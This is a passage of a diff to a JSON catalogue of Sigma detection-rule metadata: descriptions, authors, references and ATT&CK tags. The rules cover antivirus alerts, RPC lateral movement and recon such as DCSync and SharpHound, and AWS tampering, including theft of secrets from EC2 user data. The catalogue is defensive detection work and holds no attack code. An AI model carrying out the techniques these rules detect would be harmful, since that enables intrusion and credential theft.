"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_printernightmare_cve_2021_34527.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "6fe1719e-ecdf-4caf-bffe-4f501cb0a561", - "value": "Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection" - }, - { - "description": "Detects a highly relevant Antivirus alert that reports ransomware", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/12", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_ransomware.yml", - "level": "critical", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/?s=antivirus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_ransomware.yml" - ], - "tags": [ - "attack.t1486" - ] - }, - "uuid": "4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", - "value": "Antivirus Ransomware Detection" - }, - { - "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name", - "meta": { - "author": "Florian Roth, Arnim Rupp", - "creation_date": "2018/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_relevant_files.yml", - "level": "high", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_relevant_files.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588" - ] - }, - "uuid": "c9a88268-0047-4824-ba6e-4d81ce0b907c", - "value": "Antivirus Relevant File Paths Alerts" - }, - { - "description": "Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches.", - "meta": { - "author": "Florian Roth, Arnim Rupp", - "creation_date": "2018/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_webshell.yml", - "level": "high", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", - "https://github.com/tennc/webshell", - "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", - "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", - "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", - "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", - "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", - "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", - "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_webshell.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "fdf135a2-9241-4f96-a114-bb404948f736", - "value": "Antivirus Web Shell Detection" - }, - { - "description": "Detects suspicious Django web application framework exceptions that could indicate exploitation attempts", + "description": "Detects many failed connection attempts to different ports or hosts", "meta": { "author": "Thomas Patzke", - "creation_date": "2017/08/05", + "creation_date": "2017/02/19", "falsepositive": [ - "Application bugs" + "Inventarization systems", + "Vulnerability scans" ], - "filename": "appframework_django_exceptions.yml", + "filename": "net_firewall_susp_network_scan_by_port.yml", "level": "medium", - "logsource.category": "application", - "logsource.product": "django", - "refs": [ - "https://docs.djangoproject.com/en/1.11/ref/exceptions/", - "https://docs.djangoproject.com/en/1.11/topics/logging/#django-security", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/django/appframework_django_exceptions.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "fd435618-981e-4a7c-81f8-f78ce480d616", - "value": "Django Framework Exceptions" - }, - { - "description": "Generic rule for SQL exceptions in Python according to PEP 249", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/08/12", - "falsepositive": [ - "Application bugs" - ], - "filename": "app_python_sql_exceptions.yml", - "level": "medium", - "logsource.category": "application", - "logsource.product": "python", - "refs": [ - "https://www.python.org/dev/peps/pep-0249/#exceptions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/python/app_python_sql_exceptions.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "19aefed0-ffd4-47dc-a7fc-f8b1425e84f9", - "value": "Python SQL Exceptions" - }, - { - "description": "Detects remote RPC calls to create or execute a scheduled task via ATSvc", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "rpc_firewall_atsvc_lateral_movement.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/techniques/T1053/", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1053", - "attack.t1053.002" - ] - }, - "uuid": "0fcd1c79-4eeb-4746-aba9-1b458f7a79cb", - "value": "Remote Schedule Task Lateral Movement via ATSvc" - }, - { - "description": "Detects remote RPC calls to read information about scheduled tasks via AtScv", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "rpc_firewall_atsvc_recon.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/zeronetworks/rpcfirewall", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" - ], - "tags": "No established tags" - }, - "uuid": "f177f2bc-5f3e-4453-b599-57eefce9a59c", - "value": "Remote Schedule Task Recon via AtScv" - }, - { - "description": "Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "rpc_firewall_dcsync_attack.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/techniques/T1033/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" - ], - "tags": [ - "attack.t1033" - ] - }, - "uuid": "56fda488-113e-4ce9-8076-afc2457922c3", - "value": "Possible DCSync Attack" - }, - { - "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Legitimate usage of remote file encryption" - ], - "filename": "rpc_firewall_efs_abuse.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" - ], - "tags": [ - "attack.lateral_movement" - ] - }, - "uuid": "5f92fff9-82e2-48eb-8fc1-8b133556a551", - "value": "Remote Encrypting File System Abuse" - }, - { - "description": "Detects remote RPC calls to get event log information via EVEN or EVEN6", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Remote administrative tasks on Windows Events" - ], - "filename": "rpc_firewall_eventlog_recon.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml" - ], - "tags": "No established tags" - }, - "uuid": "2053961f-44c7-4a64-b62d-f6e72800af0d", - "value": "Remote Event Log Recon" - }, - { - "description": "Detects remote RPC calls to create or execute a scheduled task", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "rpc_firewall_itaskschedulerservice_lateral_movement.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/techniques/T1053/", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1053", - "attack.t1053.002" - ] - }, - "uuid": "ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d", - "value": "Remote Schedule Task Lateral Movement via ITaskSchedulerService" - }, - { - "description": "Detects remote RPC calls to read information about scheduled tasks", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "rpc_firewall_itaskschedulerservice_recon.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" - ], - "tags": "No established tags" - }, - "uuid": "7f7c49eb-2977-4ac8-8ab0-ab1bae14730e", - "value": "Remote Schedule Task Recon via ITaskSchedulerService" - }, - { - "description": "Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Actual printing" - ], - "filename": "rpc_firewall_printing_lateral_movement.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement" - ] - }, - "uuid": "bc3a4b0c-e167-48e1-aa88-b3020950e560", - "value": "Remote Printing Abuse for Lateral Movement" - }, - { - "description": "Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Some administrative tasks on remote host" - ], - "filename": "rpc_firewall_remote_dcom_or_wmi.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://attack.mitre.org/techniques/T1021/003/", - "https://attack.mitre.org/techniques/T1047/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.003", - "attack.t1047" - ] - }, - "uuid": "68050b10-e477-4377-a99b-3721b422d6ef", - "value": "Remote DCOM/WMI Lateral Movement" - }, - { - "description": "Detects remote RPC calls to modify the registry and possible execute code", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Remote administration of registry values" - ], - "filename": "rpc_firewall_remote_registry_lateral_movement.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/techniques/T1112/", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement" - ] - }, - "uuid": "35c55673-84ca-4e99-8d09-e334f3c29539", - "value": "Remote Registry Lateral Movement" - }, - { - "description": "Detects remote RPC calls to collect information", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Remote administration of registry values" - ], - "filename": "rpc_firewall_remote_registry_recon.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" - ], - "tags": "No established tags" - }, - "uuid": "d8ffe17e-04be-4886-beb9-c1dd1944b9a8", - "value": "Remote Registry Recon" - }, - { - "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Legitimate remote share creation" - ], - "filename": "rpc_firewall_remote_server_service_abuse.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" - ], - "tags": [ - "attack.lateral_movement" - ] - }, - "uuid": "b6ea3cc7-542f-43ef-bbe4-980fbed444c7", - "value": "Remote Server Service Abuse" - }, - { - "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Administrative tasks on remote services" - ], - "filename": "rpc_firewall_remote_service_lateral_movement.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://attack.mitre.org/techniques/T1569/002/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1569.002" - ] - }, - "uuid": "10018e73-06ec-46ec-8107-9172f1e04ff2", - "value": "Remote Server Service Abuse for Lateral Movement" - }, - { - "description": "Detects remote RPC calls to create or execute a scheduled task via SASec", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "rpc_firewall_sasec_lateral_movement.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/techniques/T1053/", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1053", - "attack.t1053.002" - ] - }, - "uuid": "aff229ab-f8cd-447b-b215-084d11e79eb0", - "value": "Remote Schedule Task Lateral Movement via SASec" - }, - { - "description": "Detects remote RPC calls to read information about scheduled tasks via SASec", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "rpc_firewall_sasec_recon.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" - ], - "tags": "No established tags" - }, - "uuid": "0a3ff354-93fc-4273-8a03-1078782de5b7", - "value": "Recon Activity via SASec" - }, - { - "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "rpc_firewall_sharphound_recon_account.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/techniques/T1087/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" - ], - "tags": [ - "attack.t1087" - ] - }, - "uuid": "65f77b1e-8e79-45bf-bb67-5988a8ce45a5", - "value": "SharpHound Recon Account Discovery" - }, - { - "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", - "meta": { - "author": "Sagie Dulce, Dekel Paz", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "rpc_firewall_sharphound_recon_sessions.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "rpc_firewall", - "refs": [ - "https://attack.mitre.org/techniques/T1033/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" - ], - "tags": [ - "attack.t1033" - ] - }, - "uuid": "6d580420-ff3f-4e0e-b6b0-41b90c787e28", - "value": "SharpHound Recon Sessions" - }, - { - "description": "Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/08/06", - "falsepositive": [ - "Application bugs" - ], - "filename": "appframework_ruby_on_rails_exceptions.yml", - "level": "medium", - "logsource.category": "application", - "logsource.product": "ruby_on_rails", - "refs": [ - "http://edgeguides.rubyonrails.org/security.html", - "http://guides.rubyonrails.org/action_controller_overview.html", - "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", - "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a", - "value": "Ruby on Rails Framework Exceptions" - }, - { - "description": "Detects suspicious Spring framework exceptions that could indicate exploitation attempts", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/08/06", - "falsepositive": [ - "Application bugs" - ], - "filename": "appframework_spring_exceptions.yml", - "level": "medium", - "logsource.category": "application", - "logsource.product": "spring", - "refs": [ - "https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/appframework_spring_exceptions.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "ae48ab93-45f7-4051-9dfe-5d30a3f78e33", - "value": "Spring Framework Exceptions" - }, - { - "description": "Detects SQL error messages that indicate probing for an injection attack", - "meta": { - "author": "Bjoern Kimminich", - "creation_date": "2017/11/27", - "falsepositive": [ - "Application bugs" - ], - "filename": "app_sqlinjection_errors.yml", - "level": "high", - "logsource.category": "application", - "logsource.product": "sql", - "refs": [ - "http://www.sqlinjection.net/errors", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/sql/app_sqlinjection_errors.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "8a670c6d-7189-4b1c-8017-a417ca84a086", - "value": "Suspicious SQL Error Messages" - }, - { - "description": "Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls.\nThis would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.\n", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/09/23", - "falsepositive": [ - "Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "aws_attached_malicious_lambda_layer.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d", - "value": "AWS Attached Malicious Lambda Layer" - }, - { - "description": "Detects disabling, deleting and updating of a Trail", - "meta": { - "author": "vitaliy0x1", - "creation_date": "2020/01/21", - "falsepositive": [ - "Valid change in a Trail" - ], - "filename": "aws_cloudtrail_disable_logging.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_cloudtrail_disable_logging.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "4db60cc0-36fb-42b7-9b58-a5b53019fb74", - "value": "AWS CloudTrail Important Change" - }, - { - "description": "Detects AWS Config Service disabling", - "meta": { - "author": "vitaliy0x1", - "creation_date": "2020/01/21", - "falsepositive": [ - "Valid change in AWS Config Service" - ], - "filename": "aws_config_disable_recording.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_config_disable_recording.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "07330162-dba1-4746-8121-a9647d49d297", - "value": "AWS Config Disabling Channel/Recorder" - }, - { - "description": "Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region.\nDisabling default encryption does not change the encryption status of your existing volumes.\n", - "meta": { - "author": "Sittikorn S", - "creation_date": "2021/06/29", - "falsepositive": [ - "System Administrator Activities", - "DEV, UAT, SAT environment. You should apply this rule with PROD account only." - ], - "filename": "aws_ec2_disable_encryption.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_disable_encryption.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486", - "attack.t1565" - ] - }, - "uuid": "16124c2d-e40b-4fcc-8f2c-5ab7870a2223", - "value": "AWS EC2 Disable EBS Encryption" - }, - { - "description": "Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment.", - "meta": { - "author": "faloker", - "creation_date": "2020/02/11", - "falsepositive": [ - "Assets management software like device42" - ], - "filename": "aws_ec2_download_userdata.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__download_userdata/main.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_download_userdata.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1020" - ] - }, - "uuid": "26ff4080-194e-47e7-9889-ef7602efed0c", - "value": "AWS EC2 Download Userdata" - }, - { - "description": "Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.", - "meta": { - "author": "faloker", - "creation_date": "2020/02/12", - "falsepositive": [ - "Valid changes to the startup script" - ], - 